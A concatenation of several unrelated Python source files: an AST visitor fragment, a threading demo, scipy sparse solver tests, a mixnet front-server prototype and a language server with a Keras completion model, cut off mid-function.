q_n = ".".join(n for n in self.stack)
self.qualnames[lineno] = q_n
def visit_FunctionDef(self, node):
"""Support method for _Visitor class"""
self.stack.append(node.name)
self.store_qualname(node.lineno)
self.stack.append('<locals>')
self.generic_visit(node)
self.stack.pop()
self.stack.pop()
def visit_ClassDef(self, node):
"""Support method for _Visitor class"""
self.stack.append(node.name)
self.store_qualname(node.lineno)
self.generic_visit(node)
self.stack.pop()
|
thread_queue.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# @File : thread_queue.py
# @Time : 2019/2/15 0:17
# @Author : MaiXiaochai
# @Site : https://github.com/MaiXiaochai
import time
import threading
import variables
"""
注意,这里如果写 import varibles.detail_url_list as url_list,
那么其他线程对detail_url_list的修改,在这里是看不到的。
所以,要用 import variables
"""
def get_detail_html(detail_url_list):
# 文章详情页
while True:
if detail_url_list:
url = detail_url_list.pop()
print("get detail html started.")
time.sleep(2)
print("get detail html end.")
def get_detail_url(detail_url_list):
# 文章列表页
print("get detail url started.")
time.sleep(4)
for i in range(20):
detail_url_list.append("http://projeect/{}".format(i))
print("get detail url end.")
def main_var():
thread_detail_url = threading.Thread(target=get_detail_url, args=(variables.detail_url_list, ))
thread_detail_url.start()
for i in range(10):
html_thread = threading.Thread(target=get_detail_html, args=(variables.detail_url_list, ))
html_thread.start()
start_time = time.time()
print("last time: {}".format(time.time() - start_time))
|
test_linsolve.py | from __future__ import division, print_function, absolute_import
import warnings
import threading
import numpy as np
from numpy import array, finfo, arange, eye, all, unique, ones, dot, matrix
import numpy.random as random
from numpy.testing import (TestCase, run_module_suite,
assert_array_almost_equal, assert_raises, assert_almost_equal,
assert_equal, assert_array_equal, assert_, assert_allclose)
import scipy.linalg
from scipy.linalg import norm, inv
from scipy.sparse import (spdiags, SparseEfficiencyWarning, csc_matrix,
csr_matrix, isspmatrix, dok_matrix, lil_matrix, bsr_matrix)
from scipy.sparse.linalg.dsolve import (spsolve, use_solver, splu, spilu,
MatrixRankWarning, _superlu)
warnings.simplefilter('ignore',SparseEfficiencyWarning)
# TODO add more comprehensive tests
use_solver(useUmfpack=False)
def toarray(a):
if isspmatrix(a):
return a.toarray()
else:
return a
class TestLinsolve(TestCase):
def test_singular(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=MatrixRankWarning)
A = csc_matrix((5,5), dtype='d')
b = array([1, 2, 3, 4, 5],dtype='d')
x = spsolve(A, b, use_umfpack=False)
assert_(not np.isfinite(x).any())
def test_singular_gh_3312(self):
# "Bad" test case that leads SuperLU to call LAPACK with invalid
# arguments. Check that it fails moderately gracefully.
ij = np.array([(17, 0), (17, 6), (17, 12), (10, 13)], dtype=np.int32)
v = np.array([0.284213, 0.94933781, 0.15767017, 0.38797296])
A = csc_matrix((v, ij.T), shape=(20, 20))
b = np.arange(20)
with warnings.catch_warnings():
try:
# should either raise a runtimeerror or return value
# appropriate for singular input
x = spsolve(A, b, use_umfpack=False)
assert_(not np.isfinite(x).any())
except RuntimeError:
pass
def test_twodiags(self):
A = spdiags([[1, 2, 3, 4, 5], [6, 5, 8, 9, 10]], [0, 1], 5, 5)
b = array([1, 2, 3, 4, 5])
# condition number of A
cond_A = norm(A.todense(),2) * norm(inv(A.todense()),2)
for t in ['f','d','F','D']:
eps = finfo(t).eps # floating point epsilon
b = b.astype(t)
for format in ['csc','csr']:
Asp = A.astype(t).asformat(format)
x = spsolve(Asp,b)
assert_(norm(b - Asp*x) < 10 * cond_A * eps)
def test_bvector_smoketest(self):
Adense = matrix([[0., 1., 1.],
[1., 0., 1.],
[0., 0., 1.]])
As = csc_matrix(Adense)
random.seed(1234)
x = random.randn(3)
b = As*x
x2 = spsolve(As, b)
assert_array_almost_equal(x, x2)
def test_bmatrix_smoketest(self):
Adense = matrix([[0., 1., 1.],
[1., 0., 1.],
[0., 0., 1.]])
As = csc_matrix(Adense)
random.seed(1234)
x = random.randn(3, 4)
Bdense = As.dot(x)
Bs = csc_matrix(Bdense)
x2 = spsolve(As, Bs)
assert_array_almost_equal(x, x2.todense())
def test_non_square(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
# A is not square.
A = ones((3, 4))
b = ones((4, 1))
assert_raises(ValueError, spsolve, A, b)
# A2 and b2 have incompatible shapes.
A2 = csc_matrix(eye(3))
b2 = array([1.0, 2.0])
assert_raises(ValueError, spsolve, A2, b2)
def test_example_comparison(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
row = array([0,0,1,2,2,2])
col = array([0,2,2,0,1,2])
data = array([1,2,3,-4,5,6])
sM = csr_matrix((data,(row,col)), shape=(3,3), dtype=float)
M = sM.todense()
row = array([0,0,1,1,0,0])
col = array([0,2,1,1,0,0])
data = array([1,1,1,1,1,1])
sN = csr_matrix((data, (row,col)), shape=(3,3), dtype=float)
N = sN.todense()
sX = spsolve(sM, sN)
X = scipy.linalg.solve(M, N)
assert_array_almost_equal(X, sX.todense())
def test_shape_compatibility(self):
A = csc_matrix([[1., 0], [0, 2]])
bs = [
[1, 6],
array([1, 6]),
[[1], [6]],
array([[1], [6]]),
csc_matrix([[1], [6]]),
csr_matrix([[1], [6]]),
dok_matrix([[1], [6]]),
bsr_matrix([[1], [6]]),
array([[1., 2., 3.], [6., 8., 10.]]),
csc_matrix([[1., 2., 3.], [6., 8., 10.]]),
csr_matrix([[1., 2., 3.], [6., 8., 10.]]),
dok_matrix([[1., 2., 3.], [6., 8., 10.]]),
bsr_matrix([[1., 2., 3.], [6., 8., 10.]]),
]
for b in bs:
x = np.linalg.solve(A.toarray(), toarray(b))
for spmattype in [csc_matrix, csr_matrix, dok_matrix, lil_matrix]:
x1 = spsolve(spmattype(A), b, use_umfpack=True)
x2 = spsolve(spmattype(A), b, use_umfpack=False)
# check solution
if x.ndim == 2 and x.shape[1] == 1:
# interprets also these as "vectors"
x = x.ravel()
assert_array_almost_equal(toarray(x1), x, err_msg=repr((b, spmattype, 1)))
assert_array_almost_equal(toarray(x2), x, err_msg=repr((b, spmattype, 2)))
# dense vs. sparse output ("vectors" are always dense)
if isspmatrix(b) and x.ndim > 1:
assert_(isspmatrix(x1), repr((b, spmattype, 1)))
assert_(isspmatrix(x2), repr((b, spmattype, 2)))
else:
assert_(isinstance(x1, np.ndarray), repr((b, spmattype, 1)))
assert_(isinstance(x2, np.ndarray), repr((b, spmattype, 2)))
# check output shape
if x.ndim == 1:
# "vector"
assert_equal(x1.shape, (A.shape[1],))
assert_equal(x2.shape, (A.shape[1],))
else:
# "matrix"
assert_equal(x1.shape, x.shape)
assert_equal(x2.shape, x.shape)
A = csc_matrix((3, 3))
b = csc_matrix((1, 3))
assert_raises(ValueError, spsolve, A, b)
def test_ndarray_support(self):
A = array([[1., 2.], [2., 0.]])
x = array([[1., 1.], [0.5, -0.5]])
b = array([[2., 0.], [2., 2.]])
assert_array_almost_equal(x, spsolve(A, b))
def test_gssv_badinput(self):
N = 10
d = arange(N) + 1.0
A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), N, N)
for spmatrix in (csc_matrix, csr_matrix):
A = spmatrix(A)
b = np.arange(N)
def not_c_contig(x):
return x.repeat(2)[::2]
def not_1dim(x):
return x[:,None]
def bad_type(x):
return x.astype(bool)
def too_short(x):
return x[:-1]
badops = [not_c_contig, not_1dim, bad_type, too_short]
for badop in badops:
msg = "%r %r" % (spmatrix, badop)
# Not C-contiguous
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, badop(A.data), A.indices, A.indptr,
b, int(spmatrix == csc_matrix), err_msg=msg)
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, A.data, badop(A.indices), A.indptr,
b, int(spmatrix == csc_matrix), err_msg=msg)
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, A.data, A.indices, badop(A.indptr),
b, int(spmatrix == csc_matrix), err_msg=msg)
def test_sparsity_preservation(self):
ident = csc_matrix([
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
b = csc_matrix([
[0, 1],
[1, 0],
[0, 0]])
x = spsolve(ident, b)
assert_equal(ident.nnz, 3)
assert_equal(b.nnz, 2)
assert_equal(x.nnz, 2)
assert_allclose(x.A, b.A, atol=1e-12, rtol=1e-12)
class TestSplu(object):
def setUp(self):
n = 40
d = arange(n) + 1
self.n = n
self.A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
random.seed(1234)
def _smoketest(self, spxlu, check, dtype):
if np.issubdtype(dtype, np.complexfloating):
A = self.A + 1j*self.A.T
else:
A = self.A
A = A.astype(dtype)
lu = spxlu(A)
rng = random.RandomState(1234)
# Input shapes
for k in [None, 1, 2, self.n, self.n+2]:
msg = "k=%r" % (k,)
if k is None:
b = rng.rand(self.n)
else:
b = rng.rand(self.n, k)
if np.issubdtype(dtype, np.complexfloating):
b = b + 1j*rng.rand(*b.shape)
b = b.astype(dtype)
x = lu.solve(b)
check(A, b, x, msg)
x = lu.solve(b, 'T')
check(A.T, b, x, msg)
x = lu.solve(b, 'H')
check(A.T.conj(), b, x, msg)
def test_splu_smoketest(self):
# Check that splu works at all
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
def check(A, b, x, msg=""):
eps = np.finfo(A.dtype).eps
r = A * x
assert_(abs(r - b).max() < 1e3*eps, msg)
self._smoketest(splu, check, np.float32)
self._smoketest(splu, check, np.float64)
self._smoketest(splu, check, np.complex64)
self._smoketest(splu, check, np.complex128)
def test_spilu_smoketest(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
errors = []
def check(A, b, x, msg=""):
r = A * x
err = abs(r - b).max()
assert_(err < 1e-2, msg)
if b.dtype in (np.float64, np.complex128):
errors.append(err)
self._smoketest(spilu, check, np.float32)
self._smoketest(spilu, check, np.float64)
self._smoketest(spilu, check, np.complex64)
self._smoketest(spilu, check, np.complex128)
assert_(max(errors) > 1e-5)
def test_splu_nnz0(self):
A = csc_matrix((5,5), dtype='d')
assert_raises(RuntimeError, splu, A)
def test_spilu_nnz0(self):
A = csc_matrix((5,5), dtype='d')
assert_raises(RuntimeError, spilu, A)
def test_splu_basic(self):
# Test basic splu functionality.
n = 30
rng = random.RandomState(12)
a = rng.rand(n, n)
a[a < 0.95] = 0
# First test with a singular matrix
a[:, 0] = 0
a_ = csc_matrix(a)
# Matrix is exactly singular
assert_raises(RuntimeError, splu, a_)
# Make a diagonal dominant, to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
b = ones(n)
x = lu.solve(b)
assert_almost_equal(dot(a, x), b)
def test_splu_perm(self):
# Test the permutation vectors exposed by splu.
n = 30
a = random.random((n, n))
a[a < 0.95] = 0
# Make a diagonal dominant, to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
# Check that the permutation indices do belong to [0, n-1].
for perm in (lu.perm_r, lu.perm_c):
assert_(all(perm > -1))
assert_(all(perm < n))
assert_equal(len(unique(perm)), len(perm))
# Now make a symmetric, and test that the two permutation vectors are
# the same
# Note: a += a.T relies on undefined behavior.
a = a + a.T
a_ = csc_matrix(a)
lu = splu(a_)
assert_array_equal(lu.perm_r, lu.perm_c)
def test_lu_refcount(self):
# Test that we are keeping track of the reference count with splu.
n = 30
a = random.random((n, n))
a[a < 0.95] = 0
# Make a diagonal dominant, to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
# And now test that we don't have a refcount bug
import sys
rc = sys.getrefcount(lu)
for attr in ('perm_r', 'perm_c'):
perm = getattr(lu, attr)
assert_equal(sys.getrefcount(lu), rc + 1)
del perm
assert_equal(sys.getrefcount(lu), rc)
def test_bad_inputs(self):
A = self.A.tocsc()
assert_raises(ValueError, splu, A[:,:4])
assert_raises(ValueError, spilu, A[:,:4])
for lu in [splu(A), spilu(A)]:
b = random.rand(42)
B = random.rand(42, 3)
BB = random.rand(self.n, 3, 9)
assert_raises(ValueError, lu.solve, b)
assert_raises(ValueError, lu.solve, B)
assert_raises(ValueError, lu.solve, BB)
assert_raises(TypeError, lu.solve,
b.astype(np.complex64))
assert_raises(TypeError, lu.solve,
b.astype(np.complex128))
def test_superlu_dlamch_i386_nan(self):
# SuperLU 4.3 calls some functions returning floats without
# declaring them. On i386@linux call convention, this fails to
# clear floating point registers after call. As a result, NaN
# can appear in the next floating point operation made.
#
# Here's a test case that triggered the issue.
n = 8
d = np.arange(n) + 1
A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
A = A.astype(np.float32)
spilu(A)
A = A + 1j*A
B = A.A
assert_(not np.isnan(B).any())
def test_lu_attr(self):
def check(dtype, complex_2=False):
A = self.A.astype(dtype)
if complex_2:
A = A + 1j*A.T
n = A.shape[0]
lu = splu(A)
# Check that the decomposition is as advertized
Pc = np.zeros((n, n))
Pc[np.arange(n), lu.perm_c] = 1
Pr = np.zeros((n, n))
Pr[lu.perm_r, np.arange(n)] = 1
Ad = A.toarray()
lhs = Pr.dot(Ad).dot(Pc)
rhs = (lu.L * lu.U).toarray()
eps = np.finfo(dtype).eps
assert_allclose(lhs, rhs, atol=100*eps)
check(np.float32)
check(np.float64)
check(np.complex64)
check(np.complex128)
check(np.complex64, True)
check(np.complex128, True)
def test_threads_parallel(self):
oks = []
def worker():
try:
self.test_splu_basic()
self.test_splu_smoketest()
self.test_spilu_smoketest()
oks.append(True)
except:
pass
threads = [threading.Thread(target=worker)
for k in range(20)]
for t in threads:
t.start()
for t in threads:
t.join()
assert_equal(len(oks), 20)
if __name__ == "__main__":
run_module_suite()
|
FrontServer.py | #!/usr/bin/env python3
import socket
import threading
import asyncio
import time
from message import Message
import TorzelaUtils as TU
# Initialize a class specifically for the round info.
# This class will track if a round is currently ongoing or not, the
# actual identifying number of the round, the time it ended, and the lock
# (so that no other messages are sent during the time of the round)
class RoundInfo:
def __init__(self, newRound, endTime):
self.open = True
self.round = newRound
self.endTime = endTime
class FrontServer:
# Set the IP and Port of the next server. Also set the listening port
# for incoming connections. The next server in the chain can
# be a Middle Server or even a Spreading Server
def __init__(self, nextServerIP, nextServerPort, localPort):
self.nextServerIP = nextServerIP
self.nextServerPort = nextServerPort
self.localPort = localPort
# Initialize round variables. This will allow us to track what
# current round the server is on, in addition to the state that the
# previous rounds are in
self.roundID = 1
self.rounds = {}
self.lock = asyncio.Lock()
self.roundDuration = 2
self.currentRound = ""
# This will allow us to associate a client with it's public key
# So that we can figure out which client should get which packet
# Entries are in the form
# ((<IP>,<Port>), <Public Key>) (i.e. (('localhost', 80), "mykey") )
# where <IP> is the client's IP address, <Port> is the client's
# listening port, and <Public Key> is the client's public key
self.clientList = []
# These arrays hold their information during each round. Position i-th
# of each array represents their respective data:
# key ; (ip, port) ; message -- respectively
# for the message that arrived the i-th in the current round.
self.clientLocalKeys = []
self.clientMessages = []
self.clientPublicKeys = []
# The server keys
self.__privateKey, self.publicKey = TU.generateKeys(
TU.createKeyGenerator() )
# We need to spawn off a thread here, else we will block
# the entire program
threading.Thread(target=self.setupConnection, args=()).start()
# Setup main listening socket to accept incoming connections
threading.Thread(target=self.listen, args=()).start()
# Create a new thread to handle the round timings
threading.Thread(target=self.manageRounds, args=()).start()
def getPublicKey(self):
return self.publicKey
def setupConnection(self):
# Before we can connect to the next server, we need
# to send a setup message to the next server
setupMsg = Message()
setupMsg.setType(0)
setupMsg.setPayload("{}".format(self.localPort))
self.connectionMade = False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while not self.connectionMade:
try:
sock.connect((self.nextServerIP, self.nextServerPort))
sock.sendall(str.encode(str(setupMsg)))
self.connectionMade = True
except:
# Put a delay here so we don't burn CPU time
time.sleep(1)
sock.close()
print("FrontServer successfully connected!")
# This is where all messages are handled
def listen(self):
# Wait until we have connected to the next server
while not self.connectionMade:
time.sleep(1)
# Listen for incoming connections
self.listenSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listenSock.bind(('localhost', self.localPort))
self.listenSock.listen(10) # buffer 10 connections
while True:
print("FrontServer awaiting connection")
conn, client_addr = self.listenSock.accept()
print("FrontServer accepted connection from " + str(client_addr))
# Spawn a thread to handle the client
threading.Thread(target=self.handleMsg, args=(conn, client_addr,)).start()
# This runs in a thread and handles messages from clients
def handleMsg(self, conn, client_addr):
# Receive data from client
clientData = conn.recv(32768).decode("utf-8")
# Format as message
clientMsg = Message()
clientMsg.loadFromString(clientData)
clientIP = client_addr[0]
if clientMsg.getNetInfo() != 1 and clientMsg.getNetInfo() != 2:
print("FrontServer got " + clientData)
# Check if the packet is for setting up a connection
if clientMsg.getNetInfo() == 0:
# Add client's public key to our list of clients
clientPort, clientPublicKey = clientMsg.getPayload().split("|")
# Build the entry for the client. See clientList above
# Store the public key as a string
clientEntry = ((clientIP, clientPort), clientPublicKey)
if clientEntry not in self.clientList:
self.clientList.append(clientEntry)
conn.close()
elif clientMsg.getNetInfo() == 1:
print("Front Server received message from client")
# Process packets coming from a client and headed towards
# a dead drop only if the current round is active and the client
# hasn't already send a msessage
clientPublicKey, payload = clientMsg.getPayload().split("#", 1)
if self.currentRound.open and clientPublicKey not in self.clientPublicKeys:
# Decrypt one layer of the onion message
clientLocalKey, newPayload = TU.decryptOnionLayer(
self.__privateKey, payload, serverType=0)
clientMsg.setPayload(newPayload)
# Save the message data
# TODO (jose) -> use the lock here. Multiple threads could try to
# access this info at the same time. In fact, we should process
# messages with netinfo == 1 ONE AT A TIME or could create inconsistences.
self.clientPublicKeys.append(clientPublicKey)
self.clientLocalKeys.append(clientLocalKey)
self.clientMessages.append(clientMsg)
elif clientMsg.getNetInfo() == 2:
print("FrontServer received message from Middle server")
# TODO -> add a lock here, same as with netinfo == 1
# Encrypt one layer of the onion message
clientLocalKey = self.clientLocalKeys[ len(self.clientMessages) ]
newPayload = TU.encryptOnionLayer(self.__privateKey,
clientLocalKey,
clientMsg.getPayload())
clientMsg.setPayload(newPayload)
self.clientMessages.append(clientMsg)
elif clientMsg.getNetInfo() == 3:
# Dialing Protocol: Client -> DeadDrop
_, newPayload = TU.decryptOnionLayer(
self.__privateKey, clientMsg.getPayload(), serverType=0)
clientMsg.setPayload(newPayload)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.nextServerIP, self.nextServerPort))
sock.sendall(str(clientMsg).encode("utf-8"))
sock.close()
# A thread running this method will be in charge of the different rounds
def manageRounds(self):
while True:
time.sleep(10)
# Reset the saved info about the messages for the round before it starts
self.clientLocalKeys = []
self.clientIPsAndPorts = []
self.clientMessages = []
# Create the new round using our class above
self.currentRound = RoundInfo(round, self.roundDuration)
self.rounds[self.roundID] = self.currentRound
print("Front Server starts round: ", self.roundID)
# Tell all the clients that a new round just started
firstMsg = Message()
firstMsg.setNetInfo(5)
for clientIpAndPort, clientPK in self.clientList:
tempSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tempSock.connect((clientIpAndPort[0], int(clientIpAndPort[1])))
tempSock.sendall(str.encode(str(firstMsg)))
tempSock.close()
# Start timer
startTime = time.process_time()
# Allow clients to send messages for duration of round
# Clients can only send message while self.currentRound.open == True
while time.process_time() - startTime < self.roundDuration:
continue
# Now that round has ended, mark current round as closed
self.currentRound.open = False
# TODO -> Once the noice addition is added, the rounds should ALWAYS
# run, no matter if there are no messages
if len(self.clientMessages) > 0:
# Now that all the messages are stored in self.clientMessages,
# run the round
self.runRound()
print("Front Server finished round: ", self.roundID)
self.roundID += 1
# Runs server round. Assuming that the messages are stores in
# self.clientMessages, adds noise, shuffles them and forwards them to
# the next server
def runRound(self):
# TODO (jose): Noise addition goes here
# Apply the mixnet by shuffling the messages
nMessages = len(self.clientMessages)
permutation = TU.generatePermutation(nMessages)
shuffledMessages = TU.shuffleWithPermutation(self.clientMessages,
permutation)
# Also shuffle the messages so they still match the clientMessages:
# self.clientLocalKeys[ i ] is the key that unlocks message self.clientMessges[ i ]
# This is used afterwards in handleMessage, getNetInfo() == 2
self.clientLocalKeys = TU.shuffleWithPermutation(self.clientLocalKeys,
permutation)
# Forward all the messages to the next server
# Send a message to the next server notifying of the numbers of
# messages that will be sent
firstMsg = Message()
firstMsg.setNetInfo(4)
firstMsg.setPayload("{}".format(nMessages))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.nextServerIP, self.nextServerPort))
sock.sendall(str(firstMsg).encode("utf-8"))
sock.close()
# Send all the messages to the next server
for msg in shuffledMessages:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.nextServerIP, self.nextServerPort))
sock.sendall(str(msg).encode("utf-8"))
sock.close()
# Restart the messages so that we receive the responses from the
# next server
self.clientMessages = []
# Wait until we have received all the responses. These responses are
# handled in the main thread using the method handleMsg with
# msg.getNetInfo == 2
print("Front Server waiting for responses from Middle Server")
while len(self.clientMessages) < nMessages:
continue
# Unshuffle the messages
self.clientMessages = TU.unshuffleWithPermutation(self.clientMessages,
permutation)
# Send each response back to the correct client
for clientPK, msg in zip(self.clientPublicKeys, self.clientMessages):
# Find the client ip and port using the clients keys
matches = [ (ip, port) for ((ip, port), pk) in self.clientList
if clientPK == pk]
if len(matches) == 0:
print("Front server error: couldn't find client where to send the response")
continue
elif len(matches) > 1:
print("Front server error: too many clients where to send the response")
continue
clientIP, clientPort = matches[0]
clientPort = int(clientPort)
tempSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tempSock.connect((clientIP, clientPort))
tempSock.sendall(str(msg).encode("utf-8"))
tempSock.close()
|
python_ls.py | # Copyright 2017 Palantir Technologies, Inc.
import json
import logging
import os
import socketserver
import threading
import keras
import numpy as np
from functools import partial
from hashlib import sha256
from pyls_jsonrpc.dispatchers import MethodDispatcher
from pyls_jsonrpc.endpoint import Endpoint
from pyls_jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter
from keras.models import model_from_json
from . import lsp, _utils, uris
from .config import config
from .workspace import Workspace
log = logging.getLogger(__name__)
LINT_DEBOUNCE_S = 0.5 # 500 ms
PARENT_PROCESS_WATCH_INTERVAL = 10 # 10 s
MAX_WORKERS = 64
PYTHON_FILE_EXTENSIONS = ('.py', '.pyi')
CONFIG_FILEs = ('pycodestyle.cfg', 'setup.cfg', 'tox.ini', '.flake8')
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
"""A wrapper class that is used to construct a custom handler class."""
delegate = None
def setup(self):
super(_StreamHandlerWrapper, self).setup()
# pylint: disable=no-member
self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile)
def handle(self):
self.auth(self.delegate.start)
# pylint: disable=no-member
self.SHUTDOWN_CALL()
def auth(self, cb):
token = ''
if "JUPYTER_TOKEN" in os.environ:
token = os.environ["JUPYTER_TOKEN"]
else:
log.warn('! Missing jupyter token !')
data = self.rfile.readline()
try:
auth_req = json.loads(data.decode().split('\n')[0])
except:
log.error('Error parsing authentication message')
auth_error_msg = {'msg': 'AUTH_ERROR'}
self.wfile.write(json.dumps(auth_error_msg).encode())
return
hashed_token = sha256(token.encode()).hexdigest()
if auth_req.get('token') == hashed_token:
auth_success_msg = {'msg': 'AUTH_SUCCESS'}
self.wfile.write(json.dumps(auth_success_msg).encode())
cb()
else:
log.info('Failed to authenticate: invalid credentials')
auth_invalid_msg = {'msg': 'AUTH_INVALID_CRED'}
self.wfile.write(json.dumps(auth_invalid_msg).encode())
def start_tcp_lang_server(bind_addr, port, check_parent_process, handler_class):
if not issubclass(handler_class, PythonLanguageServer):
raise ValueError('Handler class must be an instance of PythonLanguageServer')
def shutdown_server(*args):
# pylint: disable=unused-argument
log.debug('Shutting down server')
# Shutdown call must be done on a thread, to prevent deadlocks
stop_thread = threading.Thread(target=server.shutdown)
stop_thread.start()
# Construct a custom wrapper class around the user's handler_class
wrapper_class = type(
handler_class.__name__ + 'Handler',
(_StreamHandlerWrapper,),
{'DELEGATE_CLASS': partial(handler_class,
check_parent_process=check_parent_process),
'SHUTDOWN_CALL': shutdown_server}
)
server = socketserver.TCPServer((bind_addr, port), wrapper_class, bind_and_activate=False)
server.allow_reuse_address = True
try:
server.server_bind()
server.server_activate()
log.info('Serving %s on (%s, %s)', handler_class.__name__, bind_addr, port)
server.serve_forever()
finally:
log.info('Shutting down')
server.server_close()
def start_io_lang_server(rfile, wfile, check_parent_process, handler_class):
if not issubclass(handler_class, PythonLanguageServer):
raise ValueError('Handler class must be an instance of PythonLanguageServer')
log.info('Starting %s IO language server', handler_class.__name__)
server = handler_class(rfile, wfile, check_parent_process)
server.start()
class PythonLanguageServer(MethodDispatcher):
""" Implementation of the Microsoft VSCode Language Server Protocol
https://github.com/Microsoft/language-server-protocol/blob/master/versions/protocol-1-x.md
"""
# pylint: disable=too-many-public-methods,redefined-builtin
def __init__(self, rx, tx, check_parent_process=False):
self.workspace = None
self.config = None
self.root_uri = None
self.watching_thread = None
self.workspaces = {}
self.uri_workspace_mapper = {}
self._jsonrpc_stream_reader = JsonRpcStreamReader(rx)
self._jsonrpc_stream_writer = JsonRpcStreamWriter(tx)
self._check_parent_process = check_parent_process
self._endpoint = Endpoint(self, self._jsonrpc_stream_writer.write, max_workers=MAX_WORKERS)
self._dispatchers = []
self._shutdown = False
with open("model/model.json", 'r') as json_file:
loaded_model_json = json_file.read()
self.model = model_from_json(loaded_model_json)
self.model.load_weights("model/model.h5")
self.encodings = {}
with open("model/encodings_int.json", 'r') as json_file:
self.encodings = json.load(json_file)
log.info("loaded the model, weights and encodings")
self.vocab = self.encodings.keys()
def start(self):
"""Entry point for the server."""
self._jsonrpc_stream_reader.listen(self._endpoint.consume)
def __getitem__(self, item):
"""Override getitem to fallback through multiple dispatchers."""
if self._shutdown and item != 'exit':
# exit is the only allowed method during shutdown
log.debug("Ignoring non-exit method during shutdown: %s", item)
raise KeyError
try:
return super(PythonLanguageServer, self).__getitem__(item)
except KeyError:
# Fallback through extra dispatchers
for dispatcher in self._dispatchers:
try:
return dispatcher[item]
except KeyError:
continue
raise KeyError()
def m_shutdown(self, **_kwargs):
self._shutdown = True
return None
def m_exit(self, **_kwargs):
self._endpoint.shutdown()
self._jsonrpc_stream_reader.close()
self._jsonrpc_stream_writer.close()
def _match_uri_to_workspace(self, uri):
workspace_uri = _utils.match_uri_to_workspace(uri, self.workspaces)
return self.workspaces.get(workspace_uri, self.workspace)
def _hook(self, hook_name, doc_uri=None, **kwargs):
"""Calls hook_name and returns a list of results from all registered handlers"""
workspace = self._match_uri_to_workspace(doc_uri)
doc = workspace.get_document(doc_uri) if doc_uri else None
hook_handlers = self.config.plugin_manager.subset_hook_caller(hook_name, self.config.disabled_plugins)
return hook_handlers(config=self.config, workspace=workspace, document=doc, **kwargs)
def capabilities(self):
server_capabilities = {
'codeActionProvider': True,
'codeLensProvider': {
'resolveProvider': False, # We may need to make this configurable
},
'completionProvider': {
'resolveProvider': True,
'triggerCharacters': ['.']
},
'documentFormattingProvider': True,
'documentHighlightProvider': True,
'documentRangeFormattingProvider': True,
'documentSymbolProvider': True,
'definitionProvider': True,
'executeCommandProvider': {
'commands': flatten(self._hook('pyls_commands'))
},
'hoverProvider': True,
'referencesProvider': True,
'renameProvider': True,
'foldingRangeProvider': True,
'signatureHelpProvider': {
'triggerCharacters': ['(', ',', '=']
},
'textDocumentSync': {
'change': lsp.TextDocumentSyncKind.INCREMENTAL,
'save': {
'includeText': True,
},
'openClose': True,
},
'workspace': {
'workspaceFolders': {
'supported': True,
'changeNotifications': True
}
},
'experimental': merge(self._hook('pyls_experimental_capabilities'))
}
log.info('Server capabilities: %s', server_capabilities)
return server_capabilities
def m_initialize(self, processId=None, rootUri=None, rootPath=None, initializationOptions=None, **_kwargs):
log.debug('Language server initialized with %s %s %s %s', processId, rootUri, rootPath, initializationOptions)
if rootUri is None:
rootUri = uris.from_fs_path(rootPath) if rootPath is not None else ''
self.workspaces.pop(self.root_uri, None)
self.root_uri = rootUri
self.config = config.Config(rootUri, initializationOptions or {},
processId, _kwargs.get('capabilities', {}))
self.workspace = Workspace(rootUri, self._endpoint, self.config)
self.workspaces[rootUri] = self.workspace
self._dispatchers = self._hook('pyls_dispatchers')
self._hook('pyls_initialize')
if self._check_parent_process and processId is not None and self.watching_thread is None:
def watch_parent_process(pid):
# exit when the given pid is not alive
if not _utils.is_process_alive(pid):
log.info("parent process %s is not alive, exiting!", pid)
self.m_exit()
else:
threading.Timer(PARENT_PROCESS_WATCH_INTERVAL, watch_parent_process, args=[pid]).start()
self.watching_thread = threading.Thread(target=watch_parent_process, args=(processId,))
self.watching_thread.daemon = True
self.watching_thread.start()
# Get our capabilities
return {'capabilities': self.capabilities()}
def m_initialized(self, **_kwargs):
self._hook('pyls_initialized')
def code_actions(self, doc_uri, range, context):
return flatten(self._hook('pyls_code_actions', doc_uri, range=range, context=context))
def code_lens(self, doc_uri):
return flatten(self._hook('pyls_code_lens', doc_uri))
def completions(self, doc_uri, position):
res = self._hook('pyls_completions', doc_uri, position=position)
if len(res) == 0 or len(res[0]) == 0:
return
completions = res[0][0]
code = res[0][1]
encoded_line = []
if len(code) != 0:
g = code.split(" ")
tokenized_line = [token for token in g[:-1]]
# remove infrequent words (get the list or set or map from deepnote)
filtered_line = list(
filter(lambda x: x in self.vocab, tokenized_line))
if len(filtered_line) == 0:
encoded_line = np.array([np.zeros(len(self.encodings))
for _ in range(40)])
else:
for item in filtered_line:
temp = np.zeros(len(self.encodings))
temp[self.encodings[item]] = 1
encoded_line.append(temp)
# one-hot encode and pad line
encoded_line = keras.preprocessing.sequence.pad_sequences(
[encoded_line], maxlen=40)
else:
encoded_line = [np.zeros(len(self.encodings))
for _ in range(40)]
oov_completions = []
enc_completions = {}
for i, c in enumerate(completions):
